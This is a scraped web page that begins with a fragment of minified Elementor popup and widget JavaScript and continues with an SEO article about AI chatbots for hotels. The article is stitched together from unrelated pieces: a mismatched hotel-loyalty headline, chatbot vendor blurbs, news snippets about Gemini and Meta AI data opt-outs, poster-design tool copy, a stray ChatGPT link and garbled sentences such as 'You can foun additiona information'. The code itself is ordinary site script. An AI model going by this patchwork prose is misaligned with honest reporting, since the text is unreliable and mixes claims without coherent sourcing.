TimesUtils{constructor(e){this.uniqueId=e.uniqueId,this.settings=e.settings,this.storage=e.storage}getTimeFramesInSecounds(e){return{day:86400,week:604800,month:2628288}[e]}setExpiration(e,t,n){if(this.storage.get(e))this.storage.set(e,t);else{const s={lifetimeInSeconds:this.getTimeFramesInSecounds(n)};this.storage.set(e,t,s)}}getImpressionsCount(){const e=this.storage.get(this.uniqueId)??0;return parseInt(e)}incrementImpressionsCount(){if(this.settings.period)if("session"!==this.settings.period){const e=this.getImpressionsCount();this.setExpiration(this.uniqueId,e+1,this.settings.period)}else sessionStorage.setItem(this.uniqueId,parseInt(sessionStorage.getItem(this.uniqueId)??0)+1);else this.storage.set("times",(this.storage.get("times")??0)+1)}shouldCountOnOpen(){this.settings.countOnOpen&&this.incrementImpressionsCount()}shouldDisplayPerTimeFrame(){return this.getImpressionsCount()1?arguments[1]:void 0;const t=parseInt(arguments.length>0&&void 0!==arguments[0]?arguments[0]:0){var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(3107)),r=s(n(6237));class _default extends o.default{constructor(){super(...arguments),this.uniqueId=`popup-${this.document.getSettings("id")}-impressions-count`;const{times_count:e,times_period:t,times_times:n}=this.getSettings();this.settings={countOnOpen:e,period:t,showsLimit:parseInt(n)},""===this.settings.period&&(this.settings.period=!1),["","close"].includes(this.settings.countOnOpen)?(this.settings.countOnOpen=!1,this.onPopupHide()):this.settings.countOnOpen=!0,this.utils=new r.default({uniqueId:this.uniqueId,settings:this.settings,storage:elementorFrontend.storage})}getName(){return"times"}check(){if(!this.settings.period){const e=this.document.getStorage("times")||0,t=this.getTimingSetting("times");return this.utils.shouldDisplayBackwordCompatible(e,t)}if("session"!==this.settings.period){if(!this.utils.shouldDisplayPerTimeFrame())return!1}else if(!this.utils.shouldDisplayPerSession())return!1;return!0}onPopupHide(){window.addEventListener("elementor/popup/hide",(()=>{this.utils.incrementImpressionsCount()}))}}t.default=_default},6470:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(3107));class _default extends o.default{getName(){return"url"}check(){const e=this.getTimingSetting("url"),t=this.getTimingSetting("action"),n=document.referrer;if("regex"!==t)return"hide"===t^-1!==n.indexOf(e);let s;try{s=new RegExp(e)}catch(e){return!1}return s.test(n)}}t.default=_default},2635:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(4622)),r=s(n(8729)),l=s(n(358)),i=s(n(62)),a=s(n(8811)),d=s(n(9758));class _default extends elementorModules.Module{constructor(e,t){super(e),this.document=t,this.triggers=[],this.triggerClasses={page_load:o.default,scrolling:r.default,scrolling_to:l.default,click:i.default,inactivity:a.default,exit_intent:d.default},this.runTriggers()}runTriggers(){const e=this.getSettings();jQuery.each(this.triggerClasses,((t,n)=>{if(!e[t])return;const s=new n(e,(()=>this.onTriggerFired()));s.run(),this.triggers.push(s)}))}destroyTriggers(){this.triggers.forEach((e=>e.destroy())),this.triggers=[]}onTriggerFired(){this.document.showModal(!0),this.destroyTriggers()}}t.default=_default},2162:(e,t)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(e,t){super(e),this.callback=t}getTriggerSetting(e){return this.getSettings(this.getName()+"_"+e)}}t.default=_default},62:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.checkClick=this.checkClick.bind(this),this.clicksCount=0}getName(){return"click"}checkClick(){this.clicksCount++,this.clicksCount===this.getTriggerSetting("times")&&this.callback()}run(){elementorFrontend.elements.$body.on("click",this.checkClick)}destroy(){elementorFrontend.elements.$body.off("click",this.checkClick)}}t.default=_default},9758:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.detectExitIntent=this.detectExitIntent.bind(this)}getName(){return"exit_intent"}detectExitIntent(e){e.clientY<=0&&this.callback()}run(){elementorFrontend.elements.$window.on("mouseleave",this.detectExitIntent)}destroy(){elementorFrontend.elements.$window.off("mouseleave",this.detectExitIntent)}}t.default=_default},8811:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.restartTimer=this.restartTimer.bind(this)}getName(){return"inactivity"}run(){this.startTimer(),elementorFrontend.elements.$document.on("keypress mousemove",this.restartTimer)}startTimer(){this.timeOut=setTimeout(this.callback,1e3*this.getTriggerSetting("time"))}clearTimer(){clearTimeout(this.timeOut)}restartTimer(){this.clearTimer(),this.startTimer()}destroy(){this.clearTimer(),elementorFrontend.elements.$document.off("keypress mousemove",this.restartTimer)}}t.default=_default},4622:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{getName(){return"page_load"}run(){this.timeout=setTimeout(this.callback,1e3*this.getTriggerSetting("delay"))}destroy(){clearTimeout(this.timeout)}}t.default=_default},358:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{getName(){return"scrolling_to"}run(){let e;try{e=jQuery(this.getTriggerSetting("selector"))}catch(e){return}e.length&&(this.setUpIntersectionObserver(),this.observer.observe(e[0]))}setUpIntersectionObserver(){this.observer=new IntersectionObserver((e=>{e.forEach((e=>{e.isIntersecting&&this.callback()}))}))}destroy(){this.observer&&this.observer.disconnect()}}t.default=_default},8729:(e,t,n)=>{var s=n(3203);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=s(n(2162));class _default extends o.default{constructor(){super(...arguments),this.checkScroll=this.checkScroll.bind(this),this.lastScrollOffset=0}getName(){return"scrolling"}checkScroll(){const e=scrollY>this.lastScrollOffset?"down":"up",t=this.getTriggerSetting("direction");if(this.lastScrollOffset=scrollY,e!==t)return;if("up"===e)return void this.callback();const n=elementorFrontend.elements.$document.height()-innerHeight;scrollY/n*100>=this.getTriggerSetting("offset")&&this.callback()}run(){elementorFrontend.elements.$window.on("scroll",this.checkScroll)}destroy(){elementorFrontend.elements.$window.off("scroll",this.checkScroll)}}t.default=_default},3002:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),["classic","full_content","cards"].forEach((e=>{elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(985).then(n.bind(n,2607))),e)})),elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(287).then(n.bind(n,2298))),"classic"),elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(287).then(n.bind(n,2298))),"full_content"),elementorFrontend.elementsHandler.attachHandler("posts",(()=>n.e(287).then(n.bind(n,8496))),"cards"),elementorFrontend.elementsHandler.attachHandler("portfolio",(()=>n.e(824).then(n.bind(n,5208))))}}t.default=_default},8650:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("share-buttons",(()=>n.e(58).then(n.bind(n,4112))))}}t.default=_default},6701:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("slides",(()=>n.e(114).then(n.bind(n,9378))))}}t.default=_default},102:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("facebook-button",(()=>n.e(443).then(n.bind(n,3225)))),elementorFrontend.elementsHandler.attachHandler("facebook-comments",(()=>n.e(443).then(n.bind(n,3225)))),elementorFrontend.elementsHandler.attachHandler("facebook-embed",(()=>n.e(443).then(n.bind(n,3225)))),elementorFrontend.elementsHandler.attachHandler("facebook-page",(()=>n.e(443).then(n.bind(n,3225))))}}t.default=_default},1748:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("table-of-contents",(()=>Promise.all([n.e(699),n.e(838)]).then(n.bind(n,8208))))}}t.default=_default},5438:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),["archive_classic","archive_full_content","archive_cards"].forEach((e=>{elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,8297))),e)})),elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,8537))),"archive_classic"),elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,8537))),"archive_full_content"),elementorFrontend.elementsHandler.attachHandler("archive-posts",(()=>n.e(685).then(n.bind(n,9409))),"archive_cards"),jQuery((function(){var e=location.search.match(/theme_template_id=(\d*)/),t=e?jQuery(".elementor-"+e[1]):[];t.length&&jQuery("html, body").animate({scrollTop:t.offset().top-window.innerHeight/2})}))}}t.default=_default},2439:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("search-form",(()=>n.e(858).then(n.bind(n,6709))))}}t.default=_default},5032:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;class _default extends elementorModules.Module{constructor(){super(),elementorFrontend.elementsHandler.attachHandler("woocommerce-menu-cart",(()=>n.e(102).then(n.bind(n,2083)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-purchase-summary",(()=>n.e(1).then(n.bind(n,484)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-checkout-page",(()=>n.e(124).then(n.bind(n,9035)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-cart",(()=>n.e(859).then(n.bind(n,7649)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-my-account",(()=>n.e(979).then(n.bind(n,1915)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-notices",(()=>n.e(497).then(n.bind(n,2627)))),elementorFrontend.elementsHandler.attachHandler("woocommerce-product-add-to-cart",(()=>n.e(800).then(n.bind(n,5767)))),elementorFrontend.isEditMode()&&elementorFrontend.on("components:init",(()=>{elementorFrontend.elements.$body.find(".elementor-widget-woocommerce-cart").length||elementorFrontend.elements.$body.append('
')}))}}t.default=_default},8003:e=>{e.exports=wp.i18n}},e=>{e.O(0,[819],(()=>{return t=7996,e(e.s=t);var t}));e.O()}]); Ask Skift: What Are Major Trends in Hotel Loyalty Programs? – Big Estruturas Metálicas
 

Ask Skift: What Are Major Trends in Hotel Loyalty Programs?

Ask Skift: What Are Major Trends in Hotel Loyalty Programs?

What is a Hotel Chatbot? 9 Benefits and Key Features to Look For

ai chatbot for hotels

Jasper has also stayed on pace with new feature development to be one of the best conversational chat solutions. We’ve written a detailed Jasper Review article for those looking into the platform, not just its chatbot. The free version should be for anyone who is starting and is interested in the AI industry and what the technology can do. Many other AI chatbots are built on the technologies that OpenAI has developed, which means they’re often behind the curve with new features and innovation. The following AI chatbots have been carefully selected based on various factors, including ease of use, features, functionality, pros and cons, and customer reviews. These chatbots will share many of the same capabilities as ChatGPT, but they each have their own areas of expertise.

Travelers can instantly begin using the ChatGPT-driven travel planner on their iOS devices by downloading the Expedia mobile app. When customers with a compatible phone or tablet open the app, they will automatically see a button. Most commonly, hotels use widgets to display their chatbots since they are not intrusive and can be easily implemented across the entire website. Easily implement a chatbot to your website with Little Hotelier’s partner integrations and apps, streamline daily operations, and increase hotel bookings. Browse our success stories to see how innovative hotel brands use hotel AI chatbots across the guest journey.

  • Using NLP, these chatbots can understand the nuances of human language, including context, intent and sentiment, enabling them to provide personalised assistance and simulate human-like conversations.
  • Whistle for Cloudbeds drives more revenue to your property as it is integrated with the Cloudbeds Platform, so guests can easily search for availability and prices without leaving the chat.
  • This French startup has developed into one of the best AI chatbots for Facebook Messenger.
  • They can speak multiple languages, making your international travelers feel welcome and truly cared for.
  • When choosing a hotel chatbot, make sure you select one that has these functionalities.

Chatfuel is another great, easy-to-use platform for building bots without coding but specifically for Facebook. Founded in 2015, the platform offers different editing tools for you to design your chatbots as you want them and allows you to set up conversational rules in the dashboard. Collaborative teams benefit from instant notifications and mobile app access for prompt follow-up. Response templates and rules-based auto replies save time and maintain consistency, catering to different scenarios.

The platform introduces conversation forms which collects information from users through chatbot conversations and it offers plugins for integration of your platform with chatbot via JSON API or RSS Feed. With all these features, ProProfs offers businesses a comprehensive customer support solution that ultimately rakes in profits. It is a worthwhile investment for businesses looking for cost-effective yet efficient solutions for marketing, sales, and customer support. A chatbot is a computer program that imitates human conversation, either spoken, written or both.

The primary function of a hotel AI chatbot is to interact with guests in a conversational manner, understanding their queries and providing them with instant and accurate responses. Using NLP, these chatbots can understand the nuances of human language, including context, intent and sentiment, enabling them to provide personalised assistance and simulate human-like conversations. Thon Hotels introduced a front-page chatbot to enhance customer service and streamline guest queries. This assistant offers real-time solutions, handling common inquiries efficiently. It’s designed to save time, allowing staff to focus on complex questions and improving overall client support.

Smart Technology: The Innovative Trend Shaping the Hospitality Industry

Writesonic’s free plan includes 10,000 monthly words and access to nearly all of Writesonic’s features (including Chatsonic). Chatsonic is the sister product that lets users chat with its AI instead of only using it for writing. The whole platform has gotten a lot of attention because it has a huge user base and is backed by Y Combinator. Like Jasper, the entire platform is worth using, and its chatbot solution is undoubtedly worth a try.

ai chatbot for hotels

For example, Edwardian Hotels’ AI chatbot, Edward, assists guests with inquiries ranging from room amenities to requests for extra pillows, enhancing the overall service experience. Moreover, AI is being used to analyze guest feedback from various platforms. Tools like TrustYou use AI to sift through online reviews and surveys, gathering insights that help hotels improve their services and address specific guest needs. In a world that can not wait, hotel chatbots have become hoteliers’ best allies in providing excellent guest experiences while generating bookings and additional revenue. They are also a great resource to streamline processes and a valuable solution for the ever-going staffing crisis in the hospitality industry.

The platform’s chatbots enhance booking processes and guest experiences by integrating with hotel booking systems and automating a range of routine tasks. Connect, engage, and convert Chat GPT using live chat software built for 24/7 automation. ProProfs Chat is designed specifically for businesses looking for real-time sales and support solutions for their websites.

With 76% of hotel operators prioritizing initiatives to boost employee productivity, robotics are stepping in to help simplify operations and enhance guest satisfaction. The latest iterations of contactless tech involve hotels embracing digital wallets and mobile payment solutions in order to satisfy travelers eager for contactless payment options. Biometric recognition adds an extra layer of convenience and security, while digital tipping helps improve staff retention by ensuring that gratuities can be given effortlessly. From energy-efficient lighting and HVAC systems to hotel automation, hotels are embracing technology to reduce their environmental footprint without compromising guest comfort. As more properties integrate hotel sustainability trends into their operations, they’ll also attract more conscientious guests, build loyalty and lead the charge toward a greener future.

One of the primary benefits of hotel chatbots is their ability to enhance customer service. Chatbots provide round-the-clock assistance, ensuring that guests’ queries are addressed promptly, regardless of the time of day. This instant support creates a sense of convenience and satisfaction among guests, improving guest loyalty and positive reviews. In addition to their role in guest interactions, chatbots also provide hotels with valuable insights and data. By analyzing the conversations and interactions with guests, hotels can gain valuable insights into guest preferences, pain points, and areas for improvement.

Join us as we explore 10 cutting-edge trends shaping the landscape of guest experiences and operational excellence in 2024. Privacy and data security are critical concerns when implementing chatbots in hotels. Guests might hesitate to share personal information or feel uncomfortable with AI systems handling their data. To address these ai chatbot for hotels concerns, hotels must prioritize data protection and transparency. Marriott International has also embraced the power of chatbots by implementing ChatGPT. Marriott’s ChatGPT is an AI-powered virtual assistant that assists guests in making reservations, answering questions, and even providing information about COVID-19 protocols.

Once your poster is exactly as you envisioned, it’s time to save and share your work. Export in various formats like JPG, PNG, or PDF, catering to both digital platforms and print materials. The internet giant will grant users access to a chatbot after years of cautious development, chasing splashy debuts from rivals OpenAI and Microsoft. Chatbots, image generators and voice assistants are gradually merging into a single technology with a conversational voice. In this powerful AI writer includes Chatsonic and Botsonic—two different types of AI chatbots. It’s perfect for people creating content for the internet that needs to be optimized for SEO.

Additionally, chatbots provide details about the paperwork consulates require, upcoming visa appointments, and may typically assist consumers through this challenging and perplexing process. Paula Carreirão has been an important voice in the hotel industry for the last 12 years, combining her hospitality experience with her passion for travel and marketing. As a hospitality expert and a Content Specialist at Cloudbeds, you’ll find Paula writing and talking about the hotel industry, technology, and content marketing.

When ChatGPT arrived from OpenAI at the end of 2022, wowing the public with the way it answered questions, wrote term papers and generated computer code, Google found itself playing catch-up. Like other tech giants, the company had spent years developing similar technology but had not released a product as advanced as ChatGPT. Immediately available to English speakers in more than 150 countries and territories, including the United States, Gemini replaces Bard and Google Assistant. It is underpinned by artificial intelligence technology that the company has been developing since early last year.

AI In Hospitality: Elevating The Hotel Guest Experience Through Innovation

Chat by Copy.ai is perfect for businesses looking for an assistant-type chatbot for internal productivity. Since it can access live data on the web, it can be used to personalize marketing materials and sales outreach. It also has a growing automation and workflow platform that makes creating new marketing and sales collateral easier when needed. Built on ChatGPT, Fin allows companies to build their own custom AI chatbots using Intercom’s tools and APIs. It uses your company’s knowledge base to answer customer queries and provides links to the articles in references.

Its cloud-based system lets you and your team work collaboratively by allowing you to connect directly to your business backend to send and receive data. You’ll also be able to gather insights into your customers and keep them engaged with your business. The conversation navigator uses relationship memory, NLP user intents, and deep dialogue context to lead conversations. While MobileMonkey is easy to use for the novice, it also has features that can build sophisticated behavior.

ai chatbot for hotels

Niloofar Mireshghallah, an AI specialist at the University of Washington, said the opt-out options, when available, might offer a measure of self-protection from the imprudent things we type into chatbots. AI experts still said it’s probably a good idea to say no if you have the option to stop chatbots from training AI on your data. When it comes to choosing an AI chatbot platform, there’s no shortage of options—making it tough to determine which is right for your business. When you define the scope of your business, you will be able to determine which platform is the best fit for your needs. It will not only give you a better understanding of the chatbot market but also improve your chances of success. Some need a platform that can handle multiple chatbots, while others want to start small and grow as needed.

And in this Chatling guide, we’re introducing you to our absolute favorite AI chatbots for hotels to help you find the perfect solution. Voluble AI chatbots, eerily proficient at carrying on conversations with a human, burst into the public consciousness in late 2022. Some Facebook users don’t like the chatbot, complaining in online forums that they’re tired of having AI foisted on them all the time or that they just https://chat.openai.com/ want to stick with what they know. So what if you don’t want Meta AI butting in every time you search for something or scroll through your social feeds? Meta and other tech companies are in an AI arms race, churning out new language models and persuading — some might say pressuring — the public to use them. This tool allows you to respond to chats in an estimated time of 15 seconds, offering optimal customer service.

It seems more advanced than Microsoft Bing’s citation capabilities and is far better than what ChatGPT can do. The “Double-Check Response” button will scan any output and compare its response to Google search results. Green means that it found similar content published on the web, and Red means that statements differ from published content (or that it could not find a match either way).

The emergence of chatbots in the hospitality industry has heralded a new era of guest interactions. Initially, simple chatbots were employed to answer frequently asked questions, provide basic information about the hotel, or assist with room bookings. However, with technological advancements, chatbots have become more sophisticated and capable of handling complex tasks. Furthermore, using chatbots as first-level customer support, requests can be filtered before reaching you, saving you time and providing prompt assistance to hotel guests.

This ensures that chatbots can access the necessary data and provide guests with accurate and real-time information during their interactions. If the hotel offers event spaces, the chatbot can provide information on available venues, catering options, audiovisual equipment, and capacity details. This simplifies the booking and organization of events, making it a hassle-free experience for guests and event planners alike. Chatbots can integrate with existing hotel systems, such as property management or booking platforms, seamlessly exchanging information and ensuring a cohesive guest experience. This automation reduces the risk of errors and improves operational efficiency, ultimately leading to cost savings for the hotel.

In addition to its chatbot, Drift’s live chat features use GPT to provide suggested replies to customers queries based on their website, marketing materials, and conversational context. The industry is also defining guest communication by leveraging AI-powered chatbots to provide immediate assistance at any time — something 77% of guests want during their next hotel stay. The hotel industry has always been about providing top-notch experiences to guests, and AI is proving to be a powerful tool to achieve just that.

When systems communicate with each other, properties minimize errors and reduce manual tasks, freeing up staff to focus on delivering exceptional service that fosters guest loyalty and repeat business. Advanced encryption algorithms and secure payment gateways protect sensitive information during online transactions, delivering peace of mind for visitors and hotel operators alike. Upgraded systems can provide proactive monitoring and detection by flagging any anomalies or potential security threats before they escalate. With fortified data security in place, hotels can build trust with guests and demonstrate their commitment to protecting their privacy in our increasingly digital age. From harnessing the brainpower of artificial intelligence (AI) to spearheading technology-driven sustainability initiatives, the world of hospitality tech is brimming with transformative possibilities. To remain competitive, hoteliers must keep up with the latest advancements.

Priceline upgrades Penny, its AI-powered chatbot – Travel Weekly

Priceline upgrades Penny, its AI-powered chatbot.

Posted: Tue, 13 Feb 2024 08:00:00 GMT [source]

Artificial Intelligence, or AI for short, refers to machines that can process data with a human-like intelligence. These smart machines can tackle problems, learn from experience, grasp human language, and adjust to new situations – just like we do. This is how the travel planning tools of Expedia are being enhanced by the Generative AI platform. Expedia has developed the ChatGPT plugin that enables travelers to begin a dialogue on the ChatGPT website and activate the Expedia plugin to plan their trip. The benefit here is that you can create powerful conversational flows and control the direction that conversations might take.

Because clients travel from all over the world and it is unlikely that hotels will be able to afford to hire employees with the requisite translation skills, this can be very helpful. In fact, 54% of hotel owners prioritize adopting instruments that improve or replace traditional front desk interactions by 2025. Such a shift towards AI-driven operations underscores the transition to more efficient, client-centric strategies.

With the successful integration, Easyway is thrilled to introduce its groundbreaking feature, Easyway Genie, powered by GPT-4. This revolutionary AI assistant is specifically designed to streamline communication between hotel receptionists and guests, saving valuable time and elevating the overall guest experience. Check even more insights on Application of Generative AI Chatbot in Customer Service. By instantly analyzing guest messages and conversation history, Easyway Genie provides personalized response suggestions, enabling receptionists to review and send them effortlessly, all with a simple click. Bob’s human-like interactions with guests create a seamless and engaging environment. Bob’s multilingual chatbot capabilities in English, Chinese, French, German, Spanish, Indonesian, Vietnamese, Hindi, and Thai make him a versatile asset for international guests.

With the help of AI chatbots, hotels can provide a personalized experience to their guests by analyzing their data and preferences. This approach allows hotels to create targeted marketing campaigns to appeal to potential guests and offer customized promotions, maximizing hotel marketing strategies. Hotel chatbots have become incredibly popular as they can help hotel staff in different areas, such as front desk, housekeeping, and hotel management. From boosting direct bookings to decreasing agents’ work overload, a hotel chatbot can act as an efficient concierge or reservation agent, delivering five-star experiences to travelers. Companies use bots to take orders, offer product suggestions, provide customer support, schedule meetings, and do other specific jobs.

That means, if 500 guests message with Fin AI per month and the chatbot can resolve 70% of those interactions, the cost would be roughly $346 per month (plus Intercom’s plan fee). A chatbot is only effective if it’s easily embeddable—otherwise, you’re limiting its reach. Look for AI chatbots that can be easily integrated into every website, app, and channel your hotel relies on for quest interaction.

Enhancing and tailoring colors is just a click away with our versatile design tool. For events, marketing, learning, or personal creations, Piktochart AI delivers captivating poster designs for every need. Go stock photos and generate images that are contextualized to your needs with our advanced AI image generator. Put your creativity to the test and generate highly realistic images that make you stand out.

AI Chatbots can qualify leads, provide personalized experiences, and assist customers through every stage of their buyer journey. This helps drive more meaningful interactions and boosts conversion rates. Finally, hotel loyalty programs have sought to reward guests looking to get in exercise during their stays. Marriott Bonvoy has offered members a seven-day trial of the FitnessOnDemand platform, which includes exercise classes on the app or website for use in the hotel room, gym or at the pool.

ai chatbot for hotels

Luckily, most chat software providers offer 24/7 training and customer support through a combination of live chat, phone, and email. However, some platforms also offer knowledge bases and help tools that can be extremely helpful when troubleshooting issues. Be sure to check what customer support options are available for your choice before making your final decision.

Netflix might suggest movies based on what you or millions of other people have watched. The auto-correct features in your text messaging or email work by learning from people’s bad typing. Without your explicit permission, major AI systems may have scooped up your public Facebook posts, your comments on Reddit or your law school admissions practice tests to mimic patterns in human language. If you ask OpenAI’s ChatGPT personal questions about your sex life, the company might use your back-and-forth to “train” its artificial intelligence. Tech websites have noted that one surefire way to avoid Facebook’s AI assistant is to use the social network’s stripped-down mobile site, mbasic.facebook.com. It’s aimed at people in developing countries using older phones on slower internet connections.

The chatbot can recognize their preferences, such as a preference for a specific type of room or dining experience. Based on this knowledge, the chatbot can proactively suggest relevant offers, upgrades, or promotions, increasing the chances of upselling and cross-selling. By Dean Elphick

Dean is the Senior Content Marketing Specialist of Little Hotelier, the all-in-one software solution purpose-built to make the lives of small accommodation providers easier. Dean has made writing and creating content his passion for the entirety of his professional life, which includes more than six years at Little Hotelier. Through content, Dean aims to provide education, inspiration, assistance, and, ultimately, value for small accommodation businesses looking to improve the way they run their operations (and live their life). Try Little Hotelier completely free for 30 days and gain access to a whole range of powerful features, including your chosen hotel chatbot.

  • In terms of pricing, some of Chatfuel’s features are free, but the Business Plan starts at $11.99/month to build unlimited bots and for up to 30,000 users.
  • Marriott’s ChatGPT is an AI-powered virtual assistant that assists guests in making reservations, answering questions, and even providing information about COVID-19 protocols.
  • In a two-hour conversation with our columnist, Microsoft’s new chatbot said it would like to be human, had a desire to be destructive and was in love with the person it was chatting with.
  • Salesforce is the CRM market leader and Salesforce Contact Genie enables multi-channel live chat supported by AI-driven assistants.

Engati chatbots make the check-out process smoother by allowing guests to settle bills, request invoices, and provide feedback on their overall experience. This facilitates a seamless departure and enables hotels to gather valuable insights for service improvements. Guests can conveniently share their feedback through the chatbot, ensuring their opinions are heard and addressed.

Both tools will help improve guest experience, but a chatbot is ultimately more efficient for hotels who are still battling staffing issues within the industry. There are many other chatbots for hotels available, some more difficult to integrate without coding skills, others available with costly subscriptions. When choosing a chatbot, ensure it provides value for guests, flexibility, and all the features you need to improve your hotel’s bottom line. Most guests turn to chatbots for quick answers to FAQs or simple questions and fast replies to any query. However, they prefer chatting with a human agent for negative issues and more complex problems with billing, booking, or other services during their stay. Provide a simple yet sophisticated solution to enhance the guest’s journey and increase conversions.

Jasper is exceptionally suited for marketing teams that create high amounts of output. Jasper Chat is only one of several pieces of the Jasper ecosystem worth using. Jasper is dialed and trained for marketing and SEO writing tasks, which is perfect for website copy and blog posts. We all know that ChatGPT can sound somewhat robotic when using it for writing assignments. Jasper and Jasper Chat solved that issue long ago with its platform for generating text meant to be shared with customers and website visitors. Keep in mind that HubSpot‘s chat builder software doesn’t quite fall under the “AI chatbot” category of “AI chatbot” because it uses a rule-based system.

AI chatbots for hotels are digital assistants powered by artificial intelligence designed to streamline and enhance customer interactions in the hospitality industry. These intelligent bots are programmed to engage in natural language conversations with hotel guests, offering real-time assistance and information. In conclusion, hotel chatbots offer numerous benefits, from enhancing customer service and operational efficiency to boosting revenue through personalized recommendations. Through successful case studies like Hilton’s Connie and Marriott’s ChatGPT, we witness the positive impact chatbots can have on the guest experience.

Wyndham hotels CEO speak on future AI plans for company – CNN

Wyndham hotels CEO speak on future AI plans for company.

Posted: Thu, 14 Sep 2023 07:00:00 GMT [source]

Also, the free plan may be sufficient for smaller websites that only need to have one chat at a time. Its bots can be built and deployed on web, mobile, home hubs, and popular messaging platforms like Twitter, Telegram, Line, and Slack. Still, the release represents a significant step to stave off a threat to Google’s most lucrative business, its search engine. A chatbot can instantly produce answers in complete sentences that don’t force people to scroll through a list of results, which is what a search engine would offer.

Unlike AI chatbots, rule-based chatbots are more limited in their capabilities because they rely on keywords and specific phrases to trigger canned responses. Conversational AI is a broader term that encompasses chatbots, virtual assistants, and other AI-generated applications. It refers to an advanced technology that allows computer programs to understand, interpret, and respond to natural language inputs. Cohesive systems that work harmoniously produce a better staff — and guest — experience.

It’s not a foolproof method for fact verification, but it works particularly well for crowdsourcing information. The free version gives users access to GPT 3.5 Turbo, a fast AI language model perfect for conversations about any industry, topic, or interest. It can answer customer inquiries, schedule appointments, provide product recommendations, suggest upgrades, provide employee support, and manage incidents. Einstein Bots seamlessly integrate with Salesforce Service Cloud, allowing Salesforce users to leverage the power of their CRM. Bots can access customer data, update records, and trigger workflows within the Service Cloud environment, providing a unified view of customer interactions.

How exactly some of their abilities arise remains an open question, but they start by ingesting a vast corpus of digitized text, learning to predict the statistical likelihood that one word follows another. Under privacy laws in some parts of the world, including the European Union, Meta must offer “objection” options for the company’s use of personal data. Read more from Google here, including options to automatically delete your chat conversations with Gemini. Some of the companies said they remove personal information before chat conversations are used to train their AI systems.

But he also expressed reservations about relying too heavily on synthetic data over other technical methods to improve AI models. AI companies should be “concerned about how human-generated content continues to exist and continues to be accessible,” she said. We integrate with your existing job dispatch system, so all your requests flow directly from the guest’s mobile device, to the relevant resolver group. Moreover, with an easy to use and intuitive management dashboard, answers can be updated in seconds, so your guests always have the most up-to-date information at their fingertips.

ai chatbot for hotels

Chatbots are becoming increasingly popular in various industries and can be used for different purposes. Some chatbots provide information, such as the weather bot created by Poncho, while others, like the Slack bot developed by Paypal, are used for transactions. Chatlyn empowers over 1,000 travel and hospitality entities with AI-powered services. When it comes to AI chatbots, determining which is the most powerful can be subjective, as it depends on specific requirements and use cases.

Hilton’s chatbot, “Connie,” has been making waves in the hospitality industry. IBM Watson’s artificial intelligence technology powers Connie and provides guests with personalized recommendations and information about local attractions. Engati chatbots excel in offering personalized recommendations as virtual concierges. Guests can rely on the chatbot for tailored suggestions on local restaurants, tourist attractions, transportation options, and entertainment venues. From directions to insider tips, the chatbot ensures that guests have a memorable and curated experience, exploring the best of what the destination offers. Furthermore, chatbots can also provide information about local attractions, events, or nearby restaurants, enhancing the overall guest experience.

You can foun additiona information about ai customer service and artificial intelligence and NLP. The study participant wowed her by carrying on a breezy conversation, deftly explaining complex concepts. But then the subject flunked some reasoning tasks that most young children easily master. Wired, which wrote about this topic last month, had opt-out instructions for more AI services. “We have no idea what they use the data for,” said Stefan Baack, a researcher with the Mozilla Foundation who recently analyzed a data repository used by ChatGPT. On free versions of Meta AI and Microsoft’s Copilot, there isn’t an opt-out option to stop your conversations from being used for AI training. Like an over-eager personal assistant, Meta AI also pops up under posts on your Facebook news feed, offering more information about what’s discussed in the post — such as the subject of a news article.

